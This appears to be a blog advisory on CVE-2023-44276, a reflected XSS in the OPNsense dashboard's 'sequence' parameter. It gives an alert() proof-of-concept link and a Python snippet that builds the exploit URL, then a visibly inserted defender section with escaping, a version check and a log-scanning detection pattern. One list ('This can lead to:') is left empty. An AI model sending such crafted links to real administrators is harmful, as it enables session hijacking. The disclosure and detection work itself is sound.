If you are running an OPNsense firewall before version 23.7.5, this post is for you. In late 2023, a serious vulnerability—CVE-2023-44276—was found that can let an attacker inject malicious JavaScript on your OPNsense Lobby Dashboard. This means somebody with network access can hijack your session or execute actions as you, just by getting you to click the wrong link.

Let's break down what this issue is about, how an attacker could use it, and how you can fix it.

What is OPNsense?

OPNsense is a powerful and popular open-source firewall and routing OS, widely used in both home and enterprise environments. Its web interface (Dashboard) is what many users interact with to configure the system.

What is CVE-2023-44276?

This CVE identifies a Cross-Site Scripting (XSS) vulnerability in OPNsense's web interface, affecting versions before 23.7.5.

Type: Reflected XSS

An attacker can exploit this by tricking someone with OPNsense administrator access (maybe you!) into clicking a crafted link.

Why Does It Matter?

Any user with dashboard access who clicks a link containing a malicious sequence parameter can have JavaScript run in their browser session. This can lead to:

A URL like this is what the attacker would send you:

https://your-opnsense-firewall.local/index.php?sequence=malicious

In vulnerable versions, if the sequence value contains script markup, it is reflected into the page unescaped and runs in your browser.

Demonstration: Proof-of-Concept XSS Payload

Here’s a simple proof-of-concept payload. Imagine an attacker sends you this link (maybe in your email or a chat message):

https://opnsense-firewall.local/index.php?sequence=%3Cscript%3Ealert('XSS!')%3C%2Fscript%3E

When you, as an authenticated user, click this, a popup will appear with "XSS!". That shows that arbitrary JavaScript can be injected.

For the curious, %3Cscript%3Ealert('XSS!')%3C%2Fscript%3E is just a URL-encoded version of <script>alert('XSS!')</script>.

Decoded Example

<script>alert('XSS!')</script>

Exploit Code Snippet

Here’s how an attacker might build such a link in Python, URL-encoding the JavaScript payload into the sequence parameter.

import urllib.parse

base_url = "https://opnsense-firewall.local/index.php"
payload = "<script>alert(document.domain)</script>"

# Encode the payload for URL transmission
encoded_payload = urllib.parse.quote(payload)

# On vulnerable versions the sequence parameter is reflected into the page unescaped
exploit_url = f"{base_url}?sequence={encoded_payload}"
print("Malicious URL:", exploit_url)

When the victim admin clicks this link and is authenticated, the script runs with their privileges.

Original References

- NVD: CVE-2023-44276 Details
- OPNsense GitHub Commit Fix
- OPNsense Advisory

Responsible Disclosure and Fix

This bug was fixed quickly in version 23.7.5 of OPNsense. The fix is simple: the code now sanitizes the sequence parameter instead of outputting it directly.

Upgrading is critical. If you are running any OPNsense version prior to 23.7.5, you are at risk.

Check your OPNsense version.

Go to the web dashboard and look for the version in the footer. If it's *before* 23.7.5, you must update.

Educate users.

Never click unsolicited or suspicious OPNsense dashboard links—especially if you’re logged in as admin.
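Added here as a defender-side illustration, not code from this post or from OPNsense: a Python model of the fix described above (escape the sequence parameter before it is written into the page), a version check against 23.7.5 for the step above, and a scan of constructed web access-log lines for the reflected-payload pattern. The HTML snippet, the log format and all sample values are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

FIXED_VERSION = (23, 7, 5)  # first release the post names as carrying the fix
# HTML/JS metacharacters that have no business in a dashboard sequence value.
SUSPICIOUS = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

def parse_version(text):
    """'23.7.4' or '23.7.4_1' -> (23, 7, 4); a missing patch number counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.groups(default="0"))

def is_vulnerable(version):
    """True when the reported OPNsense version predates 23.7.5."""
    return parse_version(version) < FIXED_VERSION

def render_sequence(sequence, sanitize):
    """Constructed stand-in for the dashboard template: raw interpolation
    (the pre-fix behaviour) versus HTML-escaping the parameter first."""
    value = html.escape(sequence, quote=True) if sanitize else sequence
    return f'<input type="hidden" name="sequence" value="{value}">'

def flag_request(log_line):
    """Decoded `sequence` value of a request to index.php when it carries
    markup, else None. Assumes a combined-format web access log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/index.php"):
        return None
    for value in parse_qs(parts.query).get("sequence", []):
        # parse_qs decoded once; a second unquote catches double-encoded payloads
        if SUSPICIOUS.search(value) or SUSPICIOUS.search(unquote(value)):
            return value
    return None

def scan(lines):
    """(line number, decoded payload) for every flagged request in the log."""
    return [(i, v) for i, line in enumerate(lines, 1) if (v := flag_request(line))]

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - admin [28/Sep/2023:05:15:00 +0000] "GET /index.php?sequence=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.7 - admin [28/Sep/2023:05:16:10 +0000] "GET /index.php?sequence=system_information:col1:show,gateways:col2:show HTTP/1.1" 200 4096',
    '10.0.0.9 - - [28/Sep/2023:05:17:30 +0000] "GET /ui/core/firmware HTTP/1.1" 200 2048',
]
```

Running `scan(SAMPLE_LOG)` reports only the first line; the escaped rendering turns the payload into `&lt;script&gt;...`, which the browser displays rather than executes.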

Summary

- CVE-2023-44276 allows attackers to inject JavaScript on the OPNsense lobby dashboard pre-23.7.5 through a crafted sequence parameter.
- Upgrading to OPNsense 23.7.5 or newer fixes the problem.

Stay safe, patch often, and remember: Even the best firewalls can fall to a naughty URL!


Need more information?
Check out the official OPNsense CVE-2023-44276 advisory or this GitHub diff showing how the bug was fixed.

If you found this post helpful, tell your sysadmin friends—they’ll thank you!


*Written exclusively for those who want to keep their networks safe from the latest threats. Always update and stay alert!*

Timeline

Published on: 09/28/2023 05:15:00 UTC
Last modified on: 10/02/2023 19:04:00 UTC